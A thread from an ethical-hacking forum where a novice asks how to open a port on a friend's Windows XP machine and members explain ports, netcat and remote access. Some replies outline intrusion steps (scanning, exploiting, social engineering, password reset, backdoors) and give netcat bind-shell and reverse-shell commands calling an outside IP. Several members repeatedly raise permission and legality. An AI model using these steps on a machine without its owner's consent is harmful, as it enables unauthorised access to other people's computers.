Ethical Hacker Community Forums

can you provide me the information how we can open a port through command promt????

Umm.. can you elaborate a little on what you're trying to accomplish?

i want to run a programme in a port so,how i can open that port through cmd?

I'm not 100% clear on what you want, but the way to think about this is that you run a program and it is assigned a port by the OS.  You don't open a port then relate it to a program.  It would help if we knew why you were opening the port.  What is it supposed to do?

want to know how a remote port can be open..and how we can connect to the port and run a programme in a system...

You need to study netcat. Then learn a little coding and you can assign a port to open in your program as long as there in no conflict. You cant just open a port with a windows command in the command prompt.

Ahhh... so you wish to know how to open a port on a remote system.  Such as port 23 for telnet or whatnot.   Well, if the port is closed, you're going to need to either run an exploit that drops a shell, or utilize what is open in an inginuitive way... such as is shown in this month's challenge. I'm of course assuming you want to open a port on a remote computer and not your own.

What he is trying to convey his, he want to open a closed port on a remote machine, so that he can get connected.

Correct me if i am wrong.

yes,most of the times telnet port is closed,yes,i want to open a closed port on a remote machine.....

But how....???

There needs to be a service or program on the other machine that is responding to your command on the remote machine. For instance, If I have managed to have installed a trojan on the remote box, I can have that respond back to me on a port of my choosing as long as there is not a conflict.

First off you should try scanning the ip with a port scanner. If the telnet port is closed than your best chance  would be to nbtstat their computer... You can google it and find tutorials on how to do it. Note though nbtstat will only work if the victim has file sharing enabled...

Think of ports as being like phones. If a phone is unplugged, your call will not be recieved. So you can call all you want, and you'll continue to get no response. If the phone is plugged in, then it will recieve your call. What it does with that call (talk to someone, VM, call forwarding, fax, etc.) depends on what service it offers. If the phone is on, but there is a block on certain numbers calling in or it possibly only allows outbound calls and not incoming calls, that is like a firewall. I could go on with this analogy, but I think you get the point.

So being able to open a port would like asking someone to plug in the phone that uses the number you happen to be calling. Or in your case, if you manage to get a command prompt, then plug in the phone yourself... start a service. Either start one that the system already has on it but not running or upload one of your own like netcat in listening mode. Now your phone is on and ready to provide a service.

On the other hand, if there is a firewall in place, then you may have to contend with that, too.

Hope this helps,
Don

PS - Welcome to EH-Net 0cyberkill0.

Thanks you all of you guys whoever posted their views. However, which things do i have to get in order to connect or open port of the remote pc? Example: IP address and MAC address? I have my friend's static ip address and mac address and he is running windows XP with service pack 2. Now which program should i use in order to get established connection? Please help. My concept is clear about opening a post but not sure about programming. Also, even if i get the program, how would i send to him pc?

Please someone clear my confusion.....thanks bros.

g.

Unless you have permission from your friend to do this, it is illegal.

You already know that he is using Windows XP SP2. Use a program like Nmap to find out what else he might be running on his computer. If he is using a firewall, you will see that a lot of ports show up as "filtered". You have to find open ports, and try to exploit whatever he may be running (for example, if he is running an Apache server, find out what version he is running and search for known exploits for that version). If that doesn't work, try social engineering (to trick your friend into installing a service that will give you the desired exploit), or, if you have access to the computer itself, you can log on and install a program. If you don't know the password, you can use something like the "Offline NT Admin" disc to reset a password, such as the Administrator account. If he doesn't have antivirus software, you can easily install something like the backdoor "tini", or Abel.dll, either of which will give you a remote command prompt.

If you don't know where to find these tools, use Google.

This thread has given you all of the necessary steps to own a computer.

jigkin22,

assuming you have permission to communicate with your friends computer then, as others have stated, you will need to install/enable a service to enable that communication. Taking it a bit further you could try looking at the likes of Remote Desktop or VNC.

However, as eth3real as stated, if you don't have permission then what you are attempting is illegal and you may be at the wrong forum. try unethicalhacker.net instead.

Hopefully you are in the right place and will be able to use all of the advice that has been supplied so far. Happy hunting

I am not going to touch the part about getting onto the target system.  That's up to you getting permission and doing your own research into remote code execution.  As for the basic way to simply get a port open, go onto the intergoogle and search "man netcat". 

To just get a listening port open on the target box:
nc -lvvp 4444   (that number can be any non-assigned port number)

To attach to the listening port from your testing system:
nc 192.168.1.100 4444   (adjust the IP and port number as needed)

To get the target system to give you a command prompt:
nc -lvvp 4444 -e cmd.exe  (the -e flag can be -c in some cases, this will open a port and bind it to cmd so that when you connect from another system you get a windows command prompt)

To get a reverse bind shell (you can't connect directly to the system because it's nat'ed):
on your testing system ->  nc -lvvp 4444
on the target system -> nc 66.67.68.69 4444 -e /bin/bash  (replace IP and port as necessary)

Note:  I am not posting these as "hacking tips" since these exact same commands are used for normal network administration.  In addition, you are going to need to have admin access to the target machine already to make this work.

what if the target computer system does nt set an administrator account,i mean the adminis account isnt locked!

First, please use proper spelling/grammar/punctuation, because it's getting hard to understand what you're saying. (And because you can't type like that in a business environment, and if you plan on doing this professionally like most of us do, it's just a good skill)

Second, tell us your whole situation.

-Is this your friend's computer?
-Do you have permission?
-Do you have physical access to the computer (i.e., can you walk over to it and use the keyboard)?
-Is a remote command prompt all you want?
-What is the point of doing this, so we can better understand?
-Do you know if there is a firewall on this computer?
-Is the computer on the same network as you (connected to the same router or hub) or are you trying to do this over the internet?

Bojan,
   Here is a pretty simple instructive video.  It'll help you understand. 

http://www.youtube.com/watch?v=oHg5SJYRHA0

Yes,I have the physical acess!!!yes I can use the keyboard but at the same time I also want to know when I will be not able to have the physical acess then what should I do?
I know the ip-adress of my friend and he has a av installed no firewall!!He is using windowssp2!
If i want to gain the acess of that system then what I have to do!!

To take eth3real's questions one step further:

• Do you have permission, to access your friend's machine
• Do you have physical access to your friend's machine

I appreciate that you want to test connectivity for the event that you cannot physically control the machine. But, before you can access the machine remotely you need to set up some systems physically, Pseud0's netcat instructions will be a good place to start looking.

I agree with RoleReversal.

The most important thing here is to make sure you have permission to access your friend's machine.

After that, you already said there is no admin password. Login as admin, and try installing a program like netcat, like Pseud0 and RoleReversal said.